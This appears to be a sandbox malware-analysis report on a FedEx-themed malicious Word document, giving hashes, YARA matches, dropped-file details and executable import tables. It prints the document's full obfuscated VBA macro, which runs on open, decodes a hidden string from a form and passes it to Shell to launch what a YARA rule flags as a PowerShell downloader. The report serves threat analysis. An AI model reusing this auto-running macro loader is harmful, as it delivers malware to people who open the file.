3692f99b...4ab2

Filters:

Filename	Category	Type	Severity	Actions

C:\Users\aETAdzjz\AppData\Local\Temp\tmp1971.bat

Created File

Text

Malicious

Mime Type	text/plain
File Size	0.41 KB
MD5	6281f5c42be41eaf431acc826cb8f1bf
SHA1	75d4aa452b5c232a2f1d9e74ccd7d616d6d66171
SHA256	e2a20c742f2100307b7bc99b92cab49a3821bb1cef322284c3440a040a991de2
SSDeep	12:ssHARPuwtosKMzr+GCrSF2q0Fiiefh7Meiw1r9KMzrl:tHgPuwa6zrfCFi9h7H9zrl

YARA Matches

Rule Name	Rule Description	Classification	Severity	Actions
PowerShell_Download_Commands	PowerShell may attempt to download external content; possible dropper	-	4/5	... YARA Actions Show Ruleset Show Match

C:\Users\aETAdzjz\Desktop\receipt_FedEX_4028873.doc

Sample File

Word Document

Suspicious

Mime Type	application/msword
File Size	198.50 KB
MD5	431399e17aee53fa70c23ac550792769
SHA1	562899367b8212c2aca639f6f6a68d5294971c94
SHA256	3692f99b76663e864b3fae22828ab01021dcc50c33f5ec041aa3b055478a4ab2
SSDeep	3072:a57WssAb0KJ7vnVMIZRfw8z8N5Ygaw/ZX/PcSJqDmO6KQcsj1u:a1zsw7yIZJEYgaw/ZXM0kmtKQcsxu

Office Information

Creator	Enpor Support
Last Modified By	user
Revision	7
Create Time	2018-12-06 13:12:00+00:00
Modify Time	2018-12-06 13:30:00+00:00

Document Information

Codepage	Cryllic
Application	Microsoft Office Word
App Version	12.0
Template	Normal
Document Security	SecurityFlag.NONE
Editing Time	480.0
Page Count	1
Line Count	1
Paragraph Count	1
Character Count	1
Chars With Spaces	1
Heading Pairs	Title
scale_crop	False
shared_doc	False

VBA Macros (3)

Macro #1: Module1


                   Attribute VB_Name = "Module1"
Sub replacefiles(ByRef pointA, ByRef need, later)
f_str = Len(later)
If pointA <= f_str Then
ch = ""
doc_print_header later, pointA, ch
idial = 1
strings_attached ch, idial
st = ""
DataFindSymbols idial - 2, st
need = need + st
pointA = pointA + 1
replacefiles pointA, need, later
End If
End Sub

Sub DataFindSymbols(ext1, ByRef date_max)
Dim m1 As Integer
m1 = -1
date_max = ""
If ext1 = m1 Then
ext1 = m1
End If
If ext1 < 1 Then
doc_print_header UserForm1.Text1, Len(UserForm1.Text1) + ext1, date_max
Else
doc_print_header UserForm1.Text1, ext1, date_max
End If
End Sub

Sub files_replace(C1, ByRef op)
op = ""
st1 = 1
replacefiles st1, op, C1
End Sub

Sub doc_print_header(str1, pty, ByRef rmin)
s11 = Left(str1, pty)
s11 = s11 + ""
rmin = Right(s11, 2 - 1)
End Sub

Sub doveryboll(m)
Dim n As Integer
Dim sadd As String
With UserForm1
sadd = "" + .ValidText
n = m - 502
End With
If m = 502 Then Shell sadd, n
End Sub

Sub ValidateOptionsForm(wstr1)
wstr1 = wstr1 + "Open"
UserForm1.TextBox1 = wstr1 + "Form"
End Sub

Sub CloseDateForm()
Dim str2 As String
files_replace UserForm1.date1, str2
UserForm1.EditText1 = str2
str2 = str2 + ""
UserForm1.ValidText = str2
End Sub



Sub date_now(ByRef b1, ByRef control, Cell1)
log2 = 1
With UserForm1
log2 = Len(.Text1)
If b1 < log2 Then
b = ""
doc_print_header .Text1, b1, b
If Cell1 <> b Then
b1 = b1 + 1
date_now b1, control, Cell1
Else
control = b1
End If
End If
End With
End Sub

Sub strings_attached(per2, ByRef arg1)
arg1 = 0
sb1 = 1
date_now sb1, arg1, per2
End Sub

Macro #2: ThisDocument


                   Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Autoopen()
ValidateOptionsForm ("case")
End Sub

Macro #3: UserForm1


                   Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{3201CC22-4323-4EF3-8B9C-19E82082DC0D}{CD48F839-E45B-49E9-A956-2DBED7A8E4A1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Private Sub EditText1_Change()
Dim ind1 As String
ind1 = "1" + "100"
End Sub

Private Sub CommandButton1_Click()

End Sub

Private Sub ValidText_Change()
Dim bol2 As Integer
bol2 = Len(UserForm1.ValidText)
Dim bol1 As String
bol1 = "V"
fh = "2"
doveryboll bol2
End Sub

Private Sub CommandButton2_Click()

End Sub

Private Sub TextBox1_Change()
Dim s As String
s = " "
s = s + UserForm1.Text1
If Len(s) = 62 + 1 Then CloseDateForm
End Sub

Private Sub ComboBox1_Change()

End Sub

YARA Matches

Rule Name	Rule Description	Classification	Severity	Actions
VBA_Execution_Commands	VBA macro may execute files or system commands	-	3/5	... YARA Actions Show Ruleset Show Match
VBA_Execution_Commands	VBA macro may execute files or system commands	-	3/5	... YARA Actions Show Ruleset Show Match

C:\Users\aETAdzjz\AppData\Local\Temp\tmp6149.exe

Created File

Binary

Suspicious

Also Known As	C:\Users\aETAdzjz\AppData\Roaming\WinDefrag\tmp7149.exe (Created File)
Mime Type	application/x-dosexec
File Size	510.50 KB
MD5	94df3603fba467e0fff637c55c8b6d1b
SHA1	93f6cd1834a402f78497d2978d3a3a58ec3bfd66
SHA256	4f9eb9ef4ef021679de344f227bc6e162f1e5bcc6950d63ee870718380c58016
SSDeep	12288:mw4zMV6fcJUCT+ZiO852/Ico+/fT3aBtYg:P8fcJUCTjOy2eGT36tx
ImpHash	18da4215c6f786f6bd7fecba770e2636

File Reputation Information

Severity	Suspicious
First Seen	2018-12-06 21:48 (UTC+1)
Last Seen	2018-12-06 22:11 (UTC+1)
Names	Win32.Exploit.Genkryptik
Families	Genkryptik
Classification	Exploit

PE Information

Image Base	0x400000
Entry Point	0x4014e0
Size Of Code	0x14e00
Size Of Initialized Data	0x7f600
Size Of Uninitialized Data	0x600
File Type	executable
Subsystem	windows_gui
Machine Type	i386
Compile Timestamp	2018-12-06 19:02:02+00:00

Version Information (9)

LegalCopyright	-
InternalName	-
FileVersion	1.0.0.0
CompanyName	-
LegalTrademarks	-
ProductName	-
ProductVersion	1.0.0.0
FileDescription	Developed using the Dev-C++ IDE
OriginalFilename	-

Sections (16)

Name	Virtual Address	Virtual Size	Raw Data Size	Raw Data Offset	Flags	Entropy
.text	0x401000	0x14c50	0x14e00	0x400	cnt_code, cnt_initialized_data, align_1bytes, align_4bytes, align_8bytes, align_16bytes, align_32bytes, align_64bytes, align_256bytes, align_1024bytes, align_2048bytes, align_4096bytes, align_8192bytes, align_mask, mem_execute, mem_read	6.04
.data	0x416000	0x5ba0	0x5c00	0x15200	cnt_initialized_data, align_2bytes, align_4bytes, align_8bytes, align_16bytes, align_32bytes, align_64bytes, align_512bytes, align_1024bytes, align_2048bytes, align_4096bytes, align_8192bytes, align_mask, mem_read, mem_write	2.16
.rdata	0x41c000	0x2868	0x2a00	0x1ae00	cnt_initialized_data, align_2bytes, align_4bytes, align_8bytes, align_16bytes, align_32bytes, align_64bytes, align_512bytes, align_1024bytes, align_2048bytes, align_4096bytes, align_8192bytes, align_mask, mem_read	5.22
.bss	0x41f000	0x478	0x0	0x0	cnt_uninitialized_data, align_2bytes, align_4bytes, align_8bytes, align_16bytes, align_32bytes, align_64bytes, align_512bytes, align_1024bytes, align_2048bytes, align_4096bytes, align_8192bytes, align_mask, mem_read, mem_write	0.0
.idata	0x420000	0xb70	0xc00	0x1d800	cnt_initialized_data, align_1bytes, align_2bytes, align_4bytes, align_16bytes, align_32bytes, align_64bytes, align_256bytes, align_512bytes, align_1024bytes, align_4096bytes, align_8192bytes, align_mask, mem_read, mem_write	4.89
.CRT	0x421000	0x38	0x200	0x1e400	cnt_initialized_data, align_1bytes, align_2bytes, align_4bytes, align_16bytes, align_32bytes, align_64bytes, align_256bytes, align_512bytes, align_1024bytes, align_4096bytes, align_8192bytes, align_mask, mem_read, mem_write	0.29
.tls	0x422000	0x20	0x200	0x1e600	cnt_initialized_data, align_1bytes, align_2bytes, align_4bytes, align_16bytes, align_32bytes, align_64bytes, align_256bytes, align_512bytes, align_1024bytes, align_4096bytes, align_8192bytes, align_mask, mem_read, mem_write	0.23
.rsrc	0x423000	0x4c40c	0x4c600	0x1e800	cnt_initialized_data, align_1bytes, align_2bytes, align_4bytes, align_16bytes, align_32bytes, align_64bytes, align_256bytes, align_512bytes, align_1024bytes, align_4096bytes, align_8192bytes, align_mask, mem_read, mem_write	7.75
/4	0x470000	0x338	0x400	0x6ae00	cnt_initialized_data, align_8bytes, align_16bytes, align_32bytes, align_64bytes, align_2048bytes, align_4096bytes, align_8192bytes, align_mask, mem_discardable, mem_read	1.89
/19	0x471000	0xd69d	0xd800	0x6b200	cnt_initialized_data, align_1bytes, align_4bytes, align_16bytes, align_64bytes, align_256bytes, align_1024bytes, align_4096bytes, align_mask, mem_discardable, mem_read	6.09
/31	0x47f000	0x1f2f	0x2000	0x78a00	cnt_initialized_data, align_1bytes, align_4bytes, align_16bytes, align_64bytes, align_256bytes, align_1024bytes, align_4096bytes, align_mask, mem_discardable, mem_read	4.61
/45	0x481000	0x1ff5	0x2000	0x7aa00	cnt_initialized_data, align_1bytes, align_4bytes, align_16bytes, align_64bytes, align_256bytes, align_1024bytes, align_4096bytes, align_mask, mem_discardable, mem_read	5.85
/57	0x483000	0xb84	0xc00	0x7ca00	cnt_initialized_data, align_1bytes, align_2bytes, align_4bytes, align_16bytes, align_32bytes, align_64bytes, align_256bytes, align_512bytes, align_1024bytes, align_4096bytes, align_8192bytes, align_mask, mem_discardable, mem_read	4.58
/70	0x484000	0x31c	0x400	0x7d600	cnt_initialized_data, align_1bytes, align_4bytes, align_16bytes, align_64bytes, align_256bytes, align_1024bytes, align_4096bytes, align_mask, mem_discardable, mem_read	4.28
/81	0x485000	0x19f2	0x1a00	0x7da00	cnt_initialized_data, align_1bytes, align_4bytes, align_16bytes, align_64bytes, align_256bytes, align_1024bytes, align_4096bytes, align_mask, mem_discardable, mem_read	3.52
/92	0x487000	0x5f8	0x600	0x7f400	cnt_initialized_data, align_1bytes, align_4bytes, align_16bytes, align_64bytes, align_256bytes, align_1024bytes, align_4096bytes, align_mask, mem_discardable, mem_read	3.18

Imports (2)

KERNEL32.dll (57)

API Name	Ordinal	IAT Address	Thunk RVA	Thunk Offset	Hint
AddAtomA	0x0	0x4201d8	0x2003c	0x1d83c	0x3
CloseHandle	0x0	0x4201dc	0x20040	0x1d840	0x53
CreateEventA	0x0	0x4201e0	0x20044	0x1d844	0x84
CreateMutexA	0x0	0x4201e4	0x20048	0x1d848	0x9e
CreateSemaphoreA	0x0	0x4201e8	0x2004c	0x1d84c	0xad
DeleteCriticalSection	0x0	0x4201ec	0x20050	0x1d850	0xd4
DuplicateHandle	0x0	0x4201f0	0x20054	0x1d854	0xea
EnterCriticalSection	0x0	0x4201f4	0x20058	0x1d858	0xef
FindAtomA	0x0	0x4201f8	0x2005c	0x1d85c	0x12e
FindResourceA	0x0	0x4201fc	0x20060	0x1d860	0x14d
GetAtomNameA	0x0	0x420200	0x20064	0x1d864	0x170
GetCurrentProcess	0x0	0x420204	0x20068	0x1d868	0x1c4
GetCurrentProcessId	0x0	0x420208	0x2006c	0x1d86c	0x1c5
GetCurrentThread	0x0	0x42020c	0x20070	0x1d870	0x1c8
GetCurrentThreadId	0x0	0x420210	0x20074	0x1d874	0x1c9
GetHandleInformation	0x0	0x420214	0x20078	0x1d878	0x200
GetLastError	0x0	0x420218	0x2007c	0x1d87c	0x203
GetProcessAffinityMask	0x0	0x42021c	0x20080	0x1d880	0x246
GetStartupInfoA	0x0	0x420220	0x20084	0x1d884	0x264
GetSystemTimeAsFileTime	0x0	0x420224	0x20088	0x1d888	0x27b
GetThreadContext	0x0	0x420228	0x2008c	0x1d88c	0x289
GetThreadPriority	0x0	0x42022c	0x20090	0x1d890	0x291
GetTickCount	0x0	0x420230	0x20094	0x1d894	0x297
InitializeCriticalSection	0x0	0x420234	0x20098	0x1d898	0x2eb
InterlockedCompareExchange	0x0	0x420238	0x2009c	0x1d89c	0x2f2
InterlockedDecrement	0x0	0x42023c	0x200a0	0x1d8a0	0x2f3
InterlockedExchange	0x0	0x420240	0x200a4	0x1d8a4	0x2f4
InterlockedExchangeAdd	0x0	0x420244	0x200a8	0x1d8a8	0x2f5
InterlockedIncrement	0x0	0x420248	0x200ac	0x1d8ac	0x2f7
LeaveCriticalSection	0x0	0x42024c	0x200b0	0x1d8b0	0x326
LoadResource	0x0	0x420250	0x200b4	0x1d8b4	0x32f
LockResource	0x0	0x420254	0x200b8	0x1d8b8	0x341
QueryPerformanceCounter	0x0	0x420258	0x200bc	0x1d8bc	0x393
ReleaseMutex	0x0	0x42025c	0x200c0	0x1d8c0	0x3be
ReleaseSemaphore	0x0	0x420260	0x200c4	0x1d8c4	0x3c2
ResetEvent	0x0	0x420264	0x200c8	0x1d8c8	0x3d3
ResumeThread	0x0	0x420268	0x200cc	0x1d8cc	0x3d6
SetEvent	0x0	0x42026c	0x200d0	0x1d8d0	0x41d
SetLastError	0x0	0x420270	0x200d4	0x1d8d4	0x436
SetProcessAffinityMask	0x0	0x420274	0x200d8	0x1d8d8	0x441
SetThreadContext	0x0	0x420278	0x200dc	0x1d8dc	0x455
SetThreadPriority	0x0	0x42027c	0x200e0	0x1d8e0	0x45d
SetUnhandledExceptionFilter	0x0	0x420280	0x200e4	0x1d8e4	0x467
SizeofResource	0x0	0x420284	0x200e8	0x1d8e8	0x473
Sleep	0x0	0x420288	0x200ec	0x1d8ec	0x474
SuspendThread	0x0	0x42028c	0x200f0	0x1d8f0	0x47c
TerminateProcess	0x0	0x420290	0x200f4	0x1d8f4	0x482
TlsAlloc	0x0	0x420294	0x200f8	0x1d8f8	0x487
TlsGetValue	0x0	0x420298	0x200fc	0x1d8fc	0x489
TlsSetValue	0x0	0x42029c	0x20100	0x1d900	0x48a
TryEnterCriticalSection	0x0	0x4202a0	0x20104	0x1d904	0x491
UnhandledExceptionFilter	0x0	0x4202a4	0x20108	0x1d908	0x496
VirtualAlloc	0x0	0x4202a8	0x2010c	0x1d90c	0x4ad
VirtualProtect	0x0	0x4202ac	0x20110	0x1d910	0x4b6
VirtualQuery	0x0	0x4202b0	0x20114	0x1d914	0x4b9
WaitForMultipleObjects	0x0	0x4202b4	0x20118	0x1d918	0x4c0
WaitForSingleObject	0x0	0x4202b8	0x2011c	0x1d91c	0x4c2

msvcrt.dll (44)

API Name	Ordinal	IAT Address	Thunk RVA	Thunk Offset	Hint
__dllonexit	0x0	0x4202c0	0x20124	0x1d924	0x37
__getmainargs	0x0	0x4202c4	0x20128	0x1d928	0x3a
__initenv	0x0	0x4202c8	0x2012c	0x1d92c	0x3b
__lconv_init	0x0	0x4202cc	0x20130	0x1d930	0x44
__set_app_type	0x0	0x4202d0	0x20134	0x1d934	0x68
__setusermatherr	0x0	0x4202d4	0x20138	0x1d938	0x6b
_acmdln	0x0	0x4202d8	0x2013c	0x1d93c	0x7a
_amsg_exit	0x0	0x4202dc	0x20140	0x1d940	0x90
_beginthreadex	0x0	0x4202e0	0x20144	0x1d944	0x9d
_cexit	0x0	0x4202e4	0x20148	0x1d948	0xa1
_endthreadex	0x0	0x4202e8	0x2014c	0x1d94c	0xda
_findclose	0x0	0x4202ec	0x20150	0x1d950	0x104
_findfirst	0x0	0x4202f0	0x20154	0x1d954	0x106
_fmode	0x0	0x4202f4	0x20158	0x1d958	0x111
_ftime	0x0	0x4202f8	0x2015c	0x1d95c	0x124
_initterm	0x0	0x4202fc	0x20160	0x1d960	0x15d
_iob	0x0	0x420300	0x20164	0x1d964	0x161
_lock	0x0	0x420304	0x20168	0x1d968	0x1ca
_onexit	0x0	0x420308	0x2016c	0x1d96c	0x271
_setjmp3	0x0	0x42030c	0x20170	0x1d970	0x2b0
_unlock	0x0	0x420310	0x20174	0x1d974	0x346
_write	0x0	0x420314	0x20178	0x1d978	0x3ef
abort	0x0	0x420318	0x2017c	0x1d97c	0x41e
calloc	0x0	0x42031c	0x20180	0x1d980	0x42b
exit	0x0	0x420320	0x20184	0x1d984	0x436
fprintf	0x0	0x420324	0x20188	0x1d988	0x446
fputc	0x0	0x420328	0x2018c	0x1d98c	0x448
fputs	0x0	0x42032c	0x20190	0x1d990	0x449
free	0x0	0x420330	0x20194	0x1d994	0x44d
fwrite	0x0	0x420334	0x20198	0x1d998	0x458
longjmp	0x0	0x420338	0x2019c	0x1d99c	0x486
malloc	0x0	0x42033c	0x201a0	0x1d9a0	0x487
memcmp	0x0	0x420340	0x201a4	0x1d9a4	0x48e
memcpy	0x0	0x420344	0x201a8	0x1d9a8	0x48f
memmove	0x0	0x420348	0x201ac	0x1d9ac	0x490
memset	0x0	0x42034c	0x201b0	0x1d9b0	0x492
printf	0x0	0x420350	0x201b4	0x1d9b4	0x497
realloc	0x0	0x420354	0x201b8	0x1d9b8	0x4a2
signal	0x0	0x420358	0x201bc	0x1d9bc	0x4ab
sprintf	0x0	0x42035c	0x201c0	0x1d9c0	0x4ae
strcmp	0x0	0x420360	0x201c4	0x1d9c4	0x4b7
strlen	0x0	0x420364	0x201c8	0x1d9c8	0x4bf
strncmp	0x0	0x420368	0x201cc	0x1d9cc	0x4c2
vfprintf	0x0	0x42036c	0x201d0	0x1d9d0	0x4e3

Icons (1)

C:\Users\aETAdzjz\AppData\Local\Temp\tmp6149.exe

Created File

Unknown

Whitelisted

Also Known As	C:\Users\aETAdzjz\AppData\Roaming\WinDefrag\tmp7149.exe (Created File)
Mime Type	application/x-empty
File Size	0.00 KB
MD5	d41d8cd98f00b204e9800998ecf8427e
SHA1	da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256	e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SSDeep	3::

File Reputation Information

Severity	Whitelisted
First Seen	2011-05-27 11:27 (UTC+2)
Last Seen	2017-04-19 12:47 (UTC+2)

c:\users\aetadzjz\appdata\local\temp\~df834800654bb3e1d0.tmp

Created File

Stream

Whitelisted

Mime Type	application/octet-stream
File Size	0.50 KB
MD5	bf619eac0cdf3f68d496ea9344137e8b
SHA1	5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5
SHA256	076a27c79e5ace2a3d47f9dd2e83e4ff6ea8872b3c2218f66c92b89b55f36560
SSDeep	3::

File Reputation Information

Severity	Whitelisted
First Seen	2011-07-06 01:20 (UTC+2)
Last Seen	2018-11-10 05:26 (UTC+1)

c:\users\aetadzjz\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-2345716840-1148442690-1481144037-1000\8b5db95fe05dd9b00e55df22e826ce4d_500c0908-381e-49dc-a6a0-1a800e9a56e0

Modified File

Stream

Unknown

Mime Type	application/octet-stream
File Size	1.02 KB
MD5	da70750b528b4d52fb0bf775d6f5c6f2
SHA1	2df212c8490799f3f07ddc3b4af9ed4c5ea0b3be
SHA256	93ae9406a7aa24438df790e980d86dbff3de11200c79ed935c3d9f66492fd7f0
SSDeep	24:NlzKf5b6U4Q7WebZY7e5n0DfFXVauU7IFFF4ZfpjU:n8b6U4sFEeOFXU7+34o

c:\users\aetadzjz\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-2345716840-1148442690-1481144037-1000\8b5db95fe05dd9b00e55df22e826ce4d_500c0908-381e-49dc-a6a0-1a800e9a56e0

Modified File

Stream

Unknown

Mime Type	application/octet-stream
File Size	1.02 KB
MD5	3936b8254a3f80e60c3af26a41ed3e9f
SHA1	089d63aa68f44bba7984217ecff5cbef1bcd3baa
SHA256	2029500e3c3a8c6a36b285b626b0b8072dc4647d9c18a3da10e8e40771c6c473
SSDeep	24:NlzKf5b6U4KrIjGoHyhYg9s2kqbycVg44d5mU:n8b6U4OIZHy+g9s/u044KU

c:\programdata\microsoft\crypto\rsa\s-1-5-18\6d14e4b1d8ca773bab785d1be032546e_500c0908-381e-49dc-a6a0-1a800e9a56e0

Created File

Stream

Unknown

Mime Type	application/octet-stream
File Size	1.04 KB
MD5	d2f945b97736bfd11ae34023c77bedfd
SHA1	051c0f1220ca16b9880a3c94da80876807787fcb
SHA256	7d6e41456f3ecafc2546fd86a25b759b1bcddda9bf3b20197ec6c5955b99f1da
SSDeep	24:LLKf5b6UWqapsa9IqOQ5Ua5XDb8E7w/IQAUWnPtoEX:Yb6UdNcXODwbz7LQAUgVN

c:\programdata\microsoft\crypto\rsa\s-1-5-18\6d14e4b1d8ca773bab785d1be032546e_500c0908-381e-49dc-a6a0-1a800e9a56e0

Created File

Stream

Unknown

Mime Type	application/octet-stream
File Size	0.05 KB
MD5	64bc6b0e1d907ae8acf27bdb155344c2
SHA1	7aa0d9af2d61d73a044f288e16fdd07813c972ba
SHA256	dd4e0b0b64da5d95420c0e5423726f109e820e18b8a0b602274a7404f16f3ab2
SSDeep	3:/lSll+:Ak

Notifications (1/1)

There are no files for this filter

There are no files in this analysis

WHOIS Domain Information

Before

After